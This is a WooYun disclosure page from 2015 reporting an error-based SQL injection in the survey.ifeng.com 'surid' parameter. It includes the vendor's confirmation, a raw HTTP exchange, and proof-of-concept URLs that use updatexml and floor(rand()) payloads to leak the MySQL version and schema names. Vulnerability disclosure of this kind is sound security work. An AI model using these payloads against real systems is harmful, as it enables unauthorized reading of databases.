当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098360

漏洞标题:凤凰网某站存在SQL报错注入可直接读取信息

相关厂商:凤凰网

漏洞作者: Forever80s

提交时间:2015-02-26 10:00

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-26: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

凤凰网某站存在SQL报错注入可直接读取信息

详细说明:

Host: survey.ifeng.com
参数surid

GET /survey/request.php?callback=jsonp1424157819222&act=postsurvey&surid=2616'&sur%5B5491%5D%5B%5D=21758&ref=http://bbs.ifeng.com/talk/special/index.shtml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://bbs.ifeng.com/talk/special/index.shtml
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: survey.ifeng.com
Cookie: Q37_sid=SoraD6; Q37_oldtopics=D5898341D18938212D18939153D18938341D18938190D18939052D18937946D18404838D18938230D17144416D18492322D18870175D18689737D18846108D15119594D15109969D15180577D18936949D18936953D18938709D18938715D18938707D18938712D; Q37_fid284=1424155688; Q37_visitedfid=349D491D500D497D469D379D364D354D728D218D550; Q37_fid218=1424143815; Q37_fid364=1424146788; Q37_fid354=1424072043; Q37_fid453=1424138799; Q37_fid379=1424144618; Q37_fid469=1424080280; Q37_fid497=1424087992; Q37_fid499=1424143254; Q37_fid500=1424148976; Q37_fid491=1424080870
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 17 Feb 2015 07:32:18 GMT
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Load-Balancing: survey144
Set-Cookie: array_pkic2=rs_http_pkandsurvey_145
Connection: Keep-alive
Content-Length: 1187
<div style="position:absolute;font-size:11px;font-family:verdana,arial;background:#EBEBEB;padding:0.5em;">
<b>MySQL Error</b><br>
<b>Message</b>: MySQL Query Error<br>
<b>SQL</b>: INSERT INTO sur_survey_user (`surid`, `userinfo`) VALUES ('2616', '{"callback":"jsonp1424157819222","act":"postsurvey","surid":"2616\\'","sur":{"5491":["21758"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtml","ip":"116.231.89.203"}')<br>
<b>Error</b>: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sur":{"5491":["21758"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtm' at line 1<br>
<b>Errno.</b>: 1064<br>
<a href="http://faq.comsenz.com/?type=mysql&dberrno=1064&dberror=You%20have%20an%20error%20in%20your%20SQL%20syntax%3B%20check%20the%20manual%20that%20corresponds%20to%20your%20MySQL%20server%20version%20for%20the%20right%20syntax%20to%20use%20near%20%27sur%22%3A%7B%225491%22%3A%5B%2221758%22%5D%7D%2C%22ref%22%3A%22http%3A%5C%2F%5C%2Fbbs.ifeng.com%5C%2Ftalk%5C%2Fspecial%5C%2Findex.shtm%27%20at%20line%201" target="_blank">Click here to seek help.</a>
</div>


POC:

http://survey.ifeng.com/survey/request.php?callback=jsonp1424157819222&act=postsurvey&sur%5B5491%5D%5B%5D=2175&ref=http://bbs.ifeng.com/talk/special/index.shtml&surid=2616%27%2b%20updatexml%281,concat%280x7e,%28SELECT%20@@version%29,0x7e%29,1%29%29%23
MySQL Error
Message: MySQL Query Error
SQL: INSERT INTO sur_survey_user (`surid`, `userinfo`) VALUES ('2616', '{"callback":"jsonp1424157819222","act":"postsurvey","sur":{"5491":["2175"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtml","surid":"2616\\'+ updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))#","ip":"116.237.88.204"}')
Error: XPATH syntax error: '~5.1.45-Community-Server-log~'
Errno.: 1105
Click here to seek help.


http://survey.ifeng.com/survey/request.php?callback=jsonp1424157819222&act=postsurvey&sur%5B5491%5D%5B%5D=2175&ref=http://bbs.ifeng.com/talk/special/index.shtml&surid=2616%27%2b%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20distinct%20concat%280x7e,schema_name,0x7e%29%20FROM%20information_schema.schemata%20LIMIT%201,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%29%23
Error: Duplicate entry '~ifeng_survey~1' for key 'group_key'

漏洞证明:

ifeng.png

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-02-27 18:31

厂商回复:

非常感谢您对凤凰网信息安全的帮助。

最新状态:

暂无


漏洞评价:

评论